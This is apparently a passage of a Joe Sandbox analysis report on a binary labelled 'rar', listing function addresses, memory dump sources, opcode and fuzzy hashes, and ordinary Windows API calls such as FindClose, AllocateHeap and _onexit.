                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CompareString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1825529933-0
                                                                                                                                                                      • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                      • Instruction ID: 6fdcf6e87c64d9216141684c68bdc28ac896fd41edbc320c3744221188a1355c
                                                                                                                                                                      • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                      • Instruction Fuzzy Hash: 22018F61B0C69245EA147F1AA80446EE611ABDAFC1FD85836EF8D6BB5ECE3CD0434714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                                                                                                                                      • Instruction ID: c3ae82bdc614c11826e6bdca786c8b497a56cf69134df4e3bc6b0c02f46cc7d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                                                                                                                                      • Instruction Fuzzy Hash: B6F0866290D2C245DA15AB7591052FCA7509B06BBCFC84336EE7C0B2D7CE5C90968730
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A24AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                      • Instruction ID: fa14eac09ecbe9ffa4286f443fb25761d61fc5751e5423f0586884a6924f35ec
                                                                                                                                                                      • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                      • Instruction Fuzzy Hash: A3F05E11B1D24341FA9C7AA95840A7EA2804FC6BA0FC96A32ED2E552C1DE5DEC434234
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E1930 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                      • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                      • Instruction ID: 7aa9fddc330abcfb751afe79d43c202b21c1c5b1c92b9911fd7d336f3797480a
                                                                                                                                                                      • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF08C23A4964359EB24AB64E44037DA652DB40BBCFD85332D63D050D8CF68D893C760
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                      • Instruction ID: 97edf4fec799982be562f1d43bd0073a1f9f954a8b54a7d9b4b46e0699c251e4
                                                                                                                                                                      • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE04652F1930381EE6C3A62285107DC2411F6AB88FD4647ACC1F0A382EC1EA09B1730
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C1050 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: 214b16c3c25e6c4fd897d1c60cefd439c4c174c33d75f03983b7db8155171e15
                                                                                                                                                                      • Instruction ID: 97e30b7573f06e07668b5ac0a05bbc7b6b5aafcfdd47605859d3f927254576c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 214b16c3c25e6c4fd897d1c60cefd439c4c174c33d75f03983b7db8155171e15
                                                                                                                                                                      • Instruction Fuzzy Hash: 62D09290E6A407D1E51CB7799C868BC96606FE4310FE04633E40D812A2DD4CA2A78A61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C1080 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: 4a21054280c5e9e103a4b9ad6529882238d8d0db00a75c09a3dd1a56174a6311
                                                                                                                                                                      • Instruction ID: 5d32fd115bcec015fd392800f8258354d89c4f1562fc162080b9425fe8bc8d1b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a21054280c5e9e103a4b9ad6529882238d8d0db00a75c09a3dd1a56174a6311
                                                                                                                                                                      • Instruction Fuzzy Hash: D9C09B51F9D40BC1F99C77BD984687C51506BE4750FD05573D80ED17D1DD0C51978630
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C1070 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: 4a21054280c5e9e103a4b9ad6529882238d8d0db00a75c09a3dd1a56174a6311
                                                                                                                                                                      • Instruction ID: a836c1f1f052c3b40246cf5e42fb15a7e62eeb0b0fd11282267a1dca5b885245
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a21054280c5e9e103a4b9ad6529882238d8d0db00a75c09a3dd1a56174a6311
                                                                                                                                                                      • Instruction Fuzzy Hash: 1CC09B51E9D44BC1F59C77BD984687C41506BE4750FD05537D80EC17D1DD0C61D78630
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A2FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                      • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                      • Instruction ID: 70aa4aac5b22dae03a568e38496456a00717a4b0b5fd93a518be41d12bb23f7e
                                                                                                                                                                      • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                      • Instruction Fuzzy Hash: D6D05E69E1AD02C7F70CFB49E844F3C96617FD4799FC14636C40C44150CFACA0468360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A1ACE0 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _onexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 572287377-0
                                                                                                                                                                      • Opcode ID: 912773467d3b3c5d449051a259f23f146562a37bc44ecb42320ce9d65bd6821d
                                                                                                                                                                      • Instruction ID: 433b2be3e49827997c8eae6a08820c849a9943b9f4fd4b34667156e063bad166
                                                                                                                                                                      • Opcode Fuzzy Hash: 912773467d3b3c5d449051a259f23f146562a37bc44ecb42320ce9d65bd6821d
                                                                                                                                                                      • Instruction Fuzzy Hash: 65A01100EA200F82AA8832BA888A8B800800BA8320FE00A228808C0382CC0C00EB0A20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E4549
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                      • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                      • Instruction ID: ffbd46a855c772c5440ceb178788d302a06cb17af4b988df4950d62e08612aaa
                                                                                                                                                                      • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                      • Instruction Fuzzy Hash: F0C09B66E0A48281D5487B6D985517C5111BF8573AFD41332D53E495F0CF5854EB4710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF7D79E67E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF7D7A049F4: LoadStringW.USER32 ref: 00007FF7D7A04A7B
                                                                                                                                                                        • Part of subcall function 00007FF7D7A049F4: LoadStringW.USER32 ref: 00007FF7D7A04A94
                                                                                                                                                                        • Part of subcall function 00007FF7D7A0B6D0: Sleep.KERNEL32(?,?,?,?,00007FF7D79DCBED,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D7A0B730
                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7D79E6CB0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
